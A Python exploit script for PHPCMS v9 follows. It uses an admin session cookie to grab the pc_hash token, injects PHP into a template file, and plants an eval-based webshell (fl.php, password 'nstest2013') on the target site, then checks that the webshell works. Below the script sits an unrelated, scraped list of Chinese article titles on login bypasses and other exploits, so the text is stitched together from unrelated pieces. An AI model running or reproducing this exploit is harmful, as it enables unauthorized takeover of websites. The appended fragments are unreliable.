#! /usr/bin/env python

import urllib2,re

#code by 花开、若相惜

#PaxMac Team

url=raw_input('input your attack url: ')

CmsCookie="PHPSESSID=18iigb6m80nrl1v7u5h53v7km3"#change here

response = urllib2.Request(url+'/index.php?m=admin')

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

#print attck.read()

pattern = re.compile('pc_hash=\w{6}', re.I)

match = pattern.search(attck.read())

if match:

hashkey=match.group()

print "I Got pc_hash :"+hashkey

attck.close()

print "Start getshell..."

data="code=%3C%3Fphp+fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW25zdGVzdDIwMTNdKTsgPz4x))%3B%3F%3E%0D%0A%7Btemplate+\

%27member%27%2C+%27header%27%7D%0D%0A%3Cdiv+id%3D%22memberArea%22%3E%0D%0A%7Btemplate+%27member%27%2C+%27left%27%7D%0D%0A%3Cdiv+class%3D%22\

col-auto%22%3E%0D%0A%3Cdiv+class%3D%22col-1+%22%3E%0D%0A%3Ch6+class%3D%22title%22%3E%E6%B6%88%E8%B4%B9%E8%AE%B0%E5%BD%95%3C%2Fh6%3E%0D%0A%3Cdiv+\

class%3D%22content%22%3E%0D%0A%3Cform+name%3D%22searchform%22+action%3D%22%7BAPP_PATH%7Dindex.php%3Fm%3Dpay%26c%3Dspend_list%26a%3Dinit%22+\

method%3D%22get%22+%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22pay%22+name%3D%22m%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+\

value%3D%22spend_list%22+name%3D%22c%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22init%22+name%3D%22a%22%3E%0D%0A%09%09%3Cdiv+\

class%3D%22search%22%3E%0D%0A%09%09%E8%AE%A2%E5%8D%95%E6%97%B6%E9%97%B4++%7Bform%3A%3Adate%28%27starttime%27%2Cformat%3A%3Adate%28%24starttime%29%29%7D\

+%E5%88%B0+++%7Bform%3A%3Adate%28%27endtime%27%2Cformat%3A%3Adate%28%24endtime%29%29%7D%0D%0A%09%09%7Bform%3A%3A\

select%28array%28%27%27%3D%3E%27%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%27%2C+%271%27%3D%3E%27%E9%87%91%E9%92%B1%27%2C+%272%27%3D%3E%27%E7%A7%AF%E5%88%86%27%29%2C%24\

type%2C%27name%3D%22type%22%27%29%7D++%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22%E6%9F%A5%E8%AF%A2%22+class%3D%22button%22+name%3D%22\

dosubmit%22%3E%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%3C%2Fform%3E%0D%0A%3Ctable+width%3D%22100%25%22+cellspacing%3D%220%22++\

class%3D%22table-list%22%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++\

%3Ctr%3E%0D%0A++++++++++++%3Cth+width%3D%2220%25%22%3E%E6%B6%88%E8%B4%B9%E5%86%85%E5%AE%B9%3C%2Fth%3E%0D%0A++++++++++++\

%3Cth+width%3D%2220%25%22%3E%E6%97%B6%E9%97%B4%3C%2Fth%3E%0D%0A++++++++++++%3Cth+width%3D%2215%25%22%3E%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%3C%2Fth%3E%0D%0A\

++++++++++++%3Cth+width%3D%228%25%22%3E%E6%95%B0%E9%87%8F%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++\

%3Ctbody%3E%0D%0A%09%7Bloop+%24list+%24info%7D+%0D%0A%09%3Ctr%3E%0D%0A%09%3Ctd+width%3D%2220%25%22+align%3D%22center%22%3E%7B%24info%5B%27msg%27%5D%7D%3C\

%2Ftd%3E%0D%0A%09%3Ctd++width%3D%2220%25%22+align%3D%22center%22%3E%7Bformat%3A%3Adate%28%24info%5B%27creat_at%27%5D%2C+1%29%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+\

width%3D%2215%25%22+align%3D%22center%22%3E%7Bif+%24info%5Btype%5D%3D%3D1%7D%E9%87%91%E9%92%B1%7Belseif+%24info%5Btype%5D%3D%3D2%7D%E7%A7%AF%E5%88%86%7B%2F\

if%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+width%3D%228%25%22+align%3D%22center%22%3E%7B%24info%5B%27value%27%5D%7D%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%7B%2Floop%7D%0D%0A\

++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A+%3Cdiv+id%3D%22pages%22%3E+%7B%24pages%7D%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cspan+\

class%3D%22o1%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o2%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o3%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o4%22%3E%3C%2Fspan%3E%0D%0A%3C%2F\

div%3E%0D%0A%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27member%27%2C+%27footer%27%7D%0D%0A&dosubmit=%E6%8F%90%E4%BA%A4&"+hashkey

response = urllib2.Request(url+'/index.php?m=template&c=file&a=edit_file&style=default&dir=pay&file=spend_list.html',data)

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

#print attck.read()

attck.close()

response = urllib2.Request(url+'/index.php?m=template&c=file&a=visualization&style=default&dir=pay&file=spend_list.html&'+hashkey)

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

attck.close()

try:

response = urllib2.Request(url+'/fl.php')

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

if str(attck.read())=="1":

print "Webshell :"+url+'/fl.php'+" "+"password:nstest2013"

else:

print "Failed!"

attck.close()

except urllib2.HTTPError, e:

print e.code

%3cphp和%3c php_phpcmsv9后台登录绕过相关推荐

  1. 友点 CMS V9.1 后台登录绕过 GetShell

    声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载. 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作 ...

  2. php绕过管理员登录,EspCMS后台登录绕过漏洞再利用

    之前4月13日在360的漏洞平台提交过一次,当时给出了能计算出db_pscode的利用工具.db_pscode是安装的时候随机生成的一个字符串常量,保存在配置文件里.4月22日,官方发布了新版本,改进 ...

  3. 通达OA 11.5 以下版本 前台任意伪造用户登录登录绕过漏洞在线实验

    转载自:[通达OA < 11.5 前台任意伪造用户登录登录绕过漏洞利用] - https://store.vsplate.com/cn/post/518/ 实验地址:https://www.vs ...

  4. 第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】

    后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...

  5. 网络摄像头 登录绕过 RCE漏洞 数据分析报告

    目录 1. 事件概述 2. 漏洞分析 2.1 目标设备的相关信息 2.2 登录绕过漏洞 2.3 Web 服务基于缓冲区溢出的远程代码执行漏洞(无需认证) 2.4 RTSP 服务基于缓冲区溢出的远程代码 ...

  6. dedecms php5.4 无法退出后台,解决更换PHP5.4以上版本后Dedecms后台登录空白问题的方法...

    为什么会出现更换PHP5.4以上版本后Dedecms后台登录空白的情况,本文将给大家详细分析,找出真正原因以及解决办法. 把PHP的版本从5.2.14升到了5.4.15,升级完后dedecms后台却打 ...

  7. ecmsadmin.php空白,帝国CMS 后台登录空白 处理方法一则

    在使用帝国cms时,后台登录后突然变为空白页,没有任何错误提示,且没有错误日志.本文介绍其处理方法之一. 经过 晚上11时左右,在调整帝国后台编辑器时,突然发现后台完全空白.重新登录时,完全空白.这个 ...

  8. ThinkPHP6项目基操(11.实战部分 部署后台静态页面模板及后台登录页面)

    实战部分 部署后台静态页面模板及后台登录页面 前言 一.部署静态资源到项目 1.新建后台静态资源文件夹 二.后台登录页面 1. 目录结构 2. 模板字符串替换配置 前言 网站后台一般是在基础静态页面上 ...

  9. shopxo 二次开发:设置(后台登录页)背景图

    shopxo 二次开发:设置(后台登录页)背景图 可通过后台设置是否背景图是否随机: 一.默认背景图片目录: 二.变更图片后,需要修改文件: 可通过后台设置是否背景图是否随机: 后台登录页随机背景图默 ...

最新文章

  1. 「反向传播非你原创」,Jürgen发文直指Hinton不应获2019本田奖
  2. jquery基础总结
  3. Http / Put 和 Post 区别
  4. Eclipse 4.9 正式发布,支持 Java 11
  5. stream+springmvc实现文件断点续传
  6. oracle如何判断奇数偶数_堆垒素数论之旅(1):奇数哥德巴赫猜想
  7. Odoo10教程---模块化一:新建一个模块及基本视图
  8. Cisco VTP protocol   实验笔记
  9. 关于Android Studio Arctic Fox版本找不到Database Inspection这件事
  10. 解决方案架构师的职责
  11. 2021年高压电工考试APP及高压电工模拟考试题库
  12. 中文核心期刊目录总览
  13. css背景色过渡效果,css3背景色过渡
  14. VMware 安装windows XP SP3 镜像下载地址 回忆xp经典
  15. 华为手机2.3亿出货量背后,一场技术+市场的胜利
  16. [Unity]DrawLine与DrawRay的区别
  17. php 多核cpu,paip.提升性能--多核cpu中的java/.net/php/c++编程
  18. 乌合之众-大众心理研究(五)
  19. linux学习篇 之 复制、黏贴、删除、撤销
  20. 基于matlab的调用电脑摄像头,截取视频图像识别颜色

热门文章

  1. gcc中的结构体成员位域
  2. Spring MVC 3.0 RESTful controller
  3. #tomcat#内部结构和处理一个请求的过程(一)
  4. 增值业务综合运营平台(VGOP)
  5. 推挽输出和开漏输出_平台/输入amp;输出
  6. 与孩子一起学编程python_与孩子一起学编程(Python读书笔记3)
  7. stringr | 文本处理方法(Ⅰ-3):字符串处理函数(下)
  8. 微擎写Android接口json,【微擎教程】getLocation需要在app.json中声明permission字段
  9. compose部署redis和mysql_浅析docker-compose部署mysql无法访问的问题
  10. Java只用一个循环语句输出九九乘法表